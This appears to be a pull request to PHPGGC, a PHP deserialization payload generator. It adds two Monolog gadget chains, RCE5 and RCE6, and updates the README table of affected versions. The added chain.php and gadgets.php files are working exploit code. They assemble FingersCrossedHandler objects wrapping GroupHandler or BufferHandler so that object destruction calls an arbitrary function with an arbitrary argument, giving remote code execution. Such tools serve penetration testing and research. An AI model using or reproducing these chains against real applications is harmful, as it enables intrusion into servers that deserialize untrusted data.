### PR TITLE
Monolog

### DIFF
--- a/README.md
+++ b/README.md
@@ -45,6 +45,7 @@ Monolog/RCE1                              1.18 <= 2.1.1+                  RCE (F
 Monolog/RCE2                              1.5 <= 2.1.1+                   RCE (Function call)    __destruct          
 Monolog/RCE3                              1.1.0 <= 1.10.0                 RCE (Function call)    __destruct          
 Monolog/RCE4                              ? <= 2.4.4+                     RCE (Command)          __destruct     *    
+Monolog/RCE5                              1.25 <= 2.2.0+                  RCE (Function call)    __destruct     *    
 Phalcon/RCE1                              <= 1.2.2                        RCE                    __wakeup       *    
 PHPCSFixer/FD1                            <= 2.17.3                       File delete            __destruct          
 PHPCSFixer/FD2                            <= 2.17.3                       File delete            __destruct          

--- a/README.md
+++ b/README.md
@@ -46,6 +46,7 @@ Monolog/RCE2                              1.5 <= 2.1.1+                   RCE (F
 Monolog/RCE3                              1.1.0 <= 1.10.0                 RCE (Function call)    __destruct          
 Monolog/RCE4                              ? <= 2.4.4+                     RCE (Command)          __destruct     *    
 Monolog/RCE5                              1.25 <= 2.2.0+                  RCE (Function call)    __destruct     *    
+Monolog/RCE6                              1.10.0 <= 2.2.0+                RCE (Function call)    __destruct     *    
 Phalcon/RCE1                              <= 1.2.2                        RCE                    __wakeup       *    
 PHPCSFixer/FD1                            <= 2.17.3                       File delete            __destruct          
 PHPCSFixer/FD2                            <= 2.17.3                       File delete            __destruct          

--- a/README.md
+++ b/README.md
@@ -41,9 +41,9 @@ Laravel/RCE6                              5.5.*                           RCE (P
 Laravel/RCE7                              ? <= 8.16.1                     RCE (Function call)    __destruct     *    
 Magento/FW1                               ? <= 1.9.4.0                    File write             __destruct     *    
 Magento/SQLI1                             ? <= 1.9.4.0                    SQL injection          __destruct          
-Monolog/RCE1                              1.18 <= 2.1.1+                  RCE (Function call)    __destruct          
-Monolog/RCE2                              1.5 <= 2.1.1+                   RCE (Function call)    __destruct          
-Monolog/RCE3                              1.1.0 <= 1.10.0                 RCE (Function call)    __destruct          
+Monolog/RCE1                              1.4.1<=1.6.1 & 1.17.2<=2.2.0+   RCE (Function call)    __destruct          
+Monolog/RCE2                              1.4.1 <= 2.2.0+                 RCE (Function call)    __destruct          
+Monolog/RCE3                              1.0.2 <= 1.10.0                 RCE (Function call)    __destruct          
 Monolog/RCE4                              ? <= 2.4.4+                     RCE (Command)          __destruct     *    
 Monolog/RCE5                              1.25 <= 2.2.0+                  RCE (Function call)    __destruct     *    
 Monolog/RCE6                              1.10.0 <= 2.2.0+                RCE (Function call)    __destruct     *    

--- a/gadgetchains/Monolog/RCE/5/chain.php
+++ b/gadgetchains/Monolog/RCE/5/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.25 <= 2.2.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mayfly';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+        return new \Monolog\Handler\FingersCrossedHandler($parameter,
+            new \Monolog\Handler\GroupHandler($function)
+        );
+    }
+}

--- a/gadgetchains/Monolog/RCE/5/gadgets.php
+++ b/gadgetchains/Monolog/RCE/5/gadgets.php
@@ -1,0 +1,30 @@
+<?php
+
+namespace Monolog\Handler 
+{
+    // killchain :  
+    // <abstract>__destruct() => <FingersCrossedHandler>close() => <FingersCrossedHandler>flushBuffer() => <GroupHandler>handleBatch($records)
+    
+    class FingersCrossedHandler {
+      protected $passthruLevel;
+      protected $buffer = array();
+      protected $handler;
+    
+     public function __construct($param, $handler)
+     {
+         $this->passthruLevel = 0;
+         $this->buffer = ['test' => [$param, 'level' => null]];
+         $this->handler = $handler;
+     }
+    
+    }
+    
+    class GroupHandler {
+      protected $processors = array();
+      public function __construct($function)
+      {
+         $this->processors = ['current', $function];
+      }
+    
+    }
+}

--- a/gadgetchains/Monolog/RCE/6/chain.php
+++ b/gadgetchains/Monolog/RCE/6/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.10.0 <= 2.2.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mayfly';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+        return new \Monolog\Handler\FingersCrossedHandler($parameter,
+            new \Monolog\Handler\BufferHandler($function)
+        );
+    }
+}

--- a/gadgetchains/Monolog/RCE/6/gadgets.php
+++ b/gadgetchains/Monolog/RCE/6/gadgets.php
@@ -1,0 +1,40 @@
+<?php
+
+namespace Monolog\Handler 
+{
+    // killchain :  
+    // <abstract>__destruct() => <FingersCrossedHandler>close() => <FingersCrossedHandler>flushBuffer() => <GroupHandler>handleBatch($records)
+    
+    class FingersCrossedHandler {
+      protected $passthruLevel;
+      protected $buffer = array();
+      protected $handler;
+    
+     public function __construct($param, $handler)
+     {
+         $this->passthruLevel = 0;
+         $this->buffer = ['test' => [$param, 'level' => null]];
+         $this->handler = $handler;
+     }
+    
+    }
+
+    class BufferHandler
+    {
+        protected $handler;
+        protected $bufferSize = -1;
+        protected $buffer;
+        # ($record['level'] < $this->level) == false
+        protected $level = null;
+        protected $initialized = true;
+        # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false
+        protected $bufferLimit = -1;
+        protected $processors;
+
+        function __construct($function)
+        {
+            $this->processors = ['current', $function];
+        }
+    }
+
+}


### PR DESCRIPTION
Add monolog/monolog gadgets rce5 & rce6.
Update README.md Monolog version compatibility on RCE  with function call and __destruct, based on automatic tests.
(not sure about the 6 as only the entrypoint is different from RCE2). 